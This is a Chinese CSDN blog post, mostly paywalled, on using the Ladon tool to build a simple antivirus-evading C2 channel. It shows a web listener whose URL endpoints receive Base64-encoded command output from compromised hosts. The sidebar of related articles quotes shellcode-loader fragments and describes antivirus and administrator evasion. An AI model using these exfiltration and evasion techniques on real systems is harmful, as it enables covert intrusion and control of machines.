利用Ladon实现C2免杀所有杀软

最新推荐文章于 2024-06-05 15:16:35 发布
最新推荐文章于 2024-06-05 15:16:35 发布
阅读量634 收藏 2
点赞数
分类专栏: Ladon 文章标签: C2 RAT 免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/118653035
版权

前言

写了几篇无回显命令执行漏洞Ladon回显方法,接下来我们它升级,既然我们可以通过漏洞执行无回显命令都可以得到回显,那么我们自己写的程序不是更轻而易举吗?所谓远控不过就是通过各种协议传输攻击者的操作指令与结果而已。早期都是用TCP协议实现,之后FTP、HTTP(什么网盘、邮箱、博客等都是并非什么新方式只是换个网址或API而已),大家常用的CS也是HTTP协议,本文用Ladon来实现个简单的C2。

启动WEB

Ladon web 800
参数
/ip.txt or ip.jpg        Get Target WanIP
/getstr/AnyString        Get Request String
/getb64/AnyString        Base64 Encode (Request String)
/deb64/Base64String      Base64 Decode (Request String)
/deb64txt/Base64String      Base64 Decode Save TXT

浏览器回显

由于是HTTP协议,可以通过浏览器访问得到Ladon回显BASE64解密结果,就是说我们只要通过命令行发送HTTP请求即可在Ladon控制台看到命令执行后的结果。getstr为发送明文,但是结果中有特殊字符或换行就无法HTTP请求了,所以我们使用BASE64加密,这个原理我们在JAVA反序列化漏洞回显中有提到过。

明文回显

http://192.168.1.43:800/getstr/cve2020

Base64回显

http://192.168.1.131:800/debase64/MTIzMTIzMTIzMTIzMTI=

保存txt

http://192.168.1.131:800/deb64txt/MTIzMTIzMTIzMTIzMTI=
http://192.168.1.131:800/debase64txt/MTIzMTIzMTIzMTIzMTI=

最低0.47元/天 解锁文章
k8gege
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
〖教程〗Ladon免杀/.NET免杀/Exe2Ps1/Ps12Exe
K8哥哥
07-16 913
背景 有很多人和我说exe被杀了怎么办?我问大家一句mimikaz被杀了你怎么办,是不是用它的PowerShell版或者转成其它格式来免,当然也可以直接修改源码免,但由于是公开的里面很多函数都被杀软盯得很死,加上很多人根本不是很懂代码,对一个公开并且很受欢迎的工具做源码免杀也是很花时间的。所以网上有不少免杀MZ的方法,EXE不能用时大家也会去用PowerShell版远程加载读取等,怎么到Ladon这你们就不知道怎么办了呢?不是一样的原理吗?难道是因为PS版体积较大?有些PY或GO写的工具先不说一般最小就2-
一款轻松免杀主流杀软c2框架
Gamma_lab的博客
06-30 2441
前言 恕我直言,cs 无论是马或者源文件都被分析烂了,且 cs 的行为太明显了,必 须要大改特改才能满足现在的红蓝对抗,但是想大改谈何容易,所以最快的方 法是寻找一款新的 c2 框架,说白了,远控自己都能写一个出来,执行一些简单 操作还是可以的。 故事从现在开始 最佳有一款老外开发的猎鹰 c2 框架说是要在下周发布,看着很吊的样子,我们 拭目以待,今天要介绍的一款好玩的用 rust 语言开发的 c2 框架,是我无意间 逛 github 上面看到的,这里我记录一下此框架的使用:为啥我会选择这个框 架,因为它是
实战shell免杀&C2远控&工具魔改(免杀日记 - 上篇)
最新发布
guanjian_ci的博客
06-05 1361
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过杀毒软件的本质就是防止被杀毒库匹配,代码、工具指纹等等!3、一个好的免杀,一定具备了多方面的性能:防杀软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
〖教程〗LadonGO免杀Win10 Defender
K8哥哥
08-03 1405
Wiki http://k8gege.org/Ladon/LadonGo.html 简介 LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.8版本包含32个功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,12种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/Mong
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1689
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
免杀对抗-C2远控篇&C&C++&SC转换格式&UUID标识&MAC物理&IPV4地址&减少熵值(1)
2401_83740129的博客
04-14 309
MAC地址也叫物理地址、硬件地址,由网络设备制造商生产时烧录在网卡的EPROM一种闪存芯片,通常可以通过程序擦写。IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。1、先用python代码将shellcode转换成uuid值。
ladon入侵检测系统GO代码实现
05-14
5. **日志与报告**:ladon系统需记录所有的检测事件,便于事后分析和审计。Go的io和fmt包提供了丰富的文件操作和格式化输出功能。 6. **可扩展性**:ladon系统应设计为模块化,方便添加新的检测规则或组件。Go语言...
Ladon-master.zip
06-16
Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。
Ladon5.8大型网络渗透扫描器&源码
12-15
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...
ladon入侵检测系统源码C#版本
05-14
ladon入侵检测系统源码C#版本,适合从业网络安全人员或者对网络安全爱好者
Ladon简明教程 _ K8哥哥1
08-03
《Ladon简明教程——全面的网络资产与安全扫描工具》 Ladon是一款功能强大的网络扫描工具,尤其在网络安全领域中,它被广泛用于资产发现、漏洞检测和弱口令扫描。本教程主要介绍Ladon的基本使用方法,包括它的核心...
c语言写免杀,cs免杀
weixin_42306938的博客
05-22 899
思路①利用c语言+veil实现免杀#include "pch.h"//可以删除#include #include #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\...
C8051F310 模拟C2协议浅析与实现
2z1c
04-18 2258
C2 C2协议标准 Each C2 frame is initiated with a START condition Each C2 frame terminates with a STOP condition All C2 devices include an 8-bit Device ID register and an 8-bit Revision ID register 寄存器 AD...
C实现分离免杀
春日野穹
02-28 2381
前期准备 1.编译好mian.exe,源码如下 #include <stdio.h> #include <windows.h> int main(int argc,char* argv[]) { //打开要执行的ShellCode文件 HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile==INVALID_HANDLE_VALUE)
c语言免杀程序源码,Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_30427953的博客
05-18 846
作者:冷锋(LengF)[BHST]博客:www.81sec.com时间:2011-5-220x00概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码的免杀不熟悉,于是就想到自己手头有类似于LCX的工具c源...
远程控制(command&control,C2)---代理,自定义协议,数据加密与混淆,域前端,域名生成算法,备用通道
AG9GgG的博客
05-06 1782
代理 代理帮助系统之间进行网络通信,作为网络通信之间的媒介。现有许多代理都能够支持重定向,包括HTRAN,ZXProxy和ZXProtMap。 代理的定义还可以拓展为P2P网络之间的信任关系,定期通信主机群或系统中的可信连接。 网络内可能有一个或多个互相信任的组织。攻击者可以利用这些关系来管理远程控制通信,减少同时出站的连接数,在连接失败时能够弹性处理,避免在受控主机之间直接通信而被怀疑。 自定义...
dll 调用exe_C格式shellcode异或加密生成dll 可过免杀过 Windows Defender
weixin_39914107的博客
11-29 530
C格式shellcode异或加密生成dll 可过免杀过 Windows Defender1简介项目地址:https://github.com/k-fire/shellcode-To-DLL测试环境: winserver2016 cs 4.0编译环境: win10 VS20192原理C格式shellcode异或加密写入dll文件当dll被调用或者被注入进其他进程时触发功能dll功能:解...
Shellcode免杀对抗(C/C++)
热门推荐
qq_74806534的博客
02-17 2万+
这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
x-ladon x-argus python
09-18
X-Ladon和X-Argus是Python编程语言的两种库或框架。它们都是用于网络安全领域的工具,并且都提供了许多有用的功能。 X-Ladon是一个轻量级的Python库,用于开发和部署RESTful风格的Web服务。它旨在提供一种简单、可...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值